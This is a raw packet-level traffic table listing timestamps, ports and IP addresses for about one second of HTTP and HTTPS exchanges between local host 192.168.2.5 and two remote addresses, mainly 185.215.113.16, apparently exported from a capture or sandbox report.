Dec 10, 2024 11:11:28.792124987 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.792136908 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.792138100 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.792167902 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.792179108 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.792979002 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.793013096 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.793025017 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.793235064 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.793869972 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.793916941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.793927908 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.793951035 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.793962955 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.794850111 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.794862032 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.794872999 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.795702934 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.795784950 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.795797110 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.796565056 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.796889067 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.796947956 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.796962023 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.797775030 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.797817945 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.797835112 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.798656940 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.798698902 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.798712969 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.799545050 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.799559116 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.799638033 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.799652100 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.800467968 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.800525904 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.800709009 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.801352024 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.801404953 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.801417112 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.802264929 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.802280903 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.802292109 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.802747011 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.803154945 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.803231001 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.803241968 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.803287983 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.803458929 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.803610086 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.804044008 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.804095984 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.804109097 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.804968119 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.805012941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.805025101 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.805226088 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.805438995 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.805888891 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.805969000 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.805982113 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.806740046 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.806763887 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.806920052 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.806996107 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.810810089 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.849709988 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:28.849720001 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.896622896 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.900518894 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.900557995 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.900652885 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.928478003 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:28.947602987 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.947659969 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.947673082 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.948035002 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.948090076 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.948108912 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.948755026 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.948832989 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.949912071 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.953468084 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:28.953483105 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.953491926 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:28.953496933 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.970453978 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.970531940 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.970544100 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.970797062 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.970866919 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.970879078 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.971750975 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.971798897 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.971811056 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.972592115 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.972605944 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.972635984 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.973510027 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.973548889 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.973566055 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.974410057 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.974435091 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.974435091 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.974462986 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.974464893 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.974477053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.974642038 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.975286007 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.975367069 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.975379944 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.976232052 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.976247072 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.976258039 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.976357937 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.977138996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.977232933 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.977246046 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.978137016 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.978195906 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.978212118 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.978924990 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.979006052 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.979017973 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.979816914 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.979866028 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.979877949 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.980676889 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.980760098 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.980772018 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.980977058 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.981147051 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.991075993 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.472434044 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.472464085 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.472476959 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.472553015 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.472611904 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.472624063 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.472641945 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.472995996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473011971 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473023891 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473035097 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473046064 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473057032 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473068953 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473079920 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473092079 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473577976 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473594904 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473606110 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473623037 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473634958 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473697901 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473716021 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473726988 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473738909 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473748922 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473762989 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.473773956 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474451065 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474462986 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474477053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474574089 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474585056 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474596024 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474607944 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474620104 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474631071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474642038 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474653959 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.474666119 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475378036 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475390911 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475406885 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475419044 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475430965 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475449085 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475459099 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475502968 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475514889 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475526094 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475538015 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.475548983 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476208925 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476387024 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476397991 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476408958 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476421118 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476432085 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476444006 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476454973 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476465940 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476476908 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476488113 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476499081 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.476511002 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477288008 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477299929 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477309942 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477322102 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477334023 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477349043 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477360964 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477371931 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477382898 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477396965 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477408886 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477420092 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477432013 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.477507114 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.478183985 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478195906 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478212118 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478224993 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478235960 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478247881 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478260040 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478290081 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478302002 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478313923 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478326082 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.478338003 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479116917 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479127884 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479140043 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479151964 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479167938 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479180098 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479190111 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479202032 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479212046 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479223967 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479234934 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479245901 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479918003 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479929924 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479940891 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479953051 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479964972 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479984045 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.479995012 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480006933 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480024099 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480035067 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480045080 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480057955 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480726004 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480879068 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480890036 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480901003 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480917931 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480928898 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480938911 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480957985 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480968952 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480979919 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.480990887 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481002092 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481014967 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481025934 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481868029 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481878996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481889963 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481900930 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481911898 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481924057 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481935024 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481945992 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481956959 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481967926 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481980085 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.481992006 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482604980 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482769966 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482781887 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482793093 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482805014 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482815981 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482827902 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482839108 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482851028 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482861996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482873917 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.482884884 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483700991 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483714104 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483725071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483736038 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483747005 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483758926 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483769894 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483782053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483793020 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483804941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483815908 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.483828068 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484482050 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484579086 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484596014 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484613895 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484636068 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484642029 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484647989 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484663963 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484684944 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484708071 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484731913 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484736919 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484749079 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484757900 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484761953 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484775066 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484780073 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484788895 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484800100 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484801054 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484812975 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484823942 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484824896 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.484846115 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484870911 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484899044 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484921932 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484944105 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484972000 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.484997034 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.485022068 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.485038042 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.485409975 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485423088 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485551119 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485565901 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485578060 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485589981 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485600948 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485613108 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485624075 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485635042 CET	80	49880	185.215.113.16	192.168.2.5
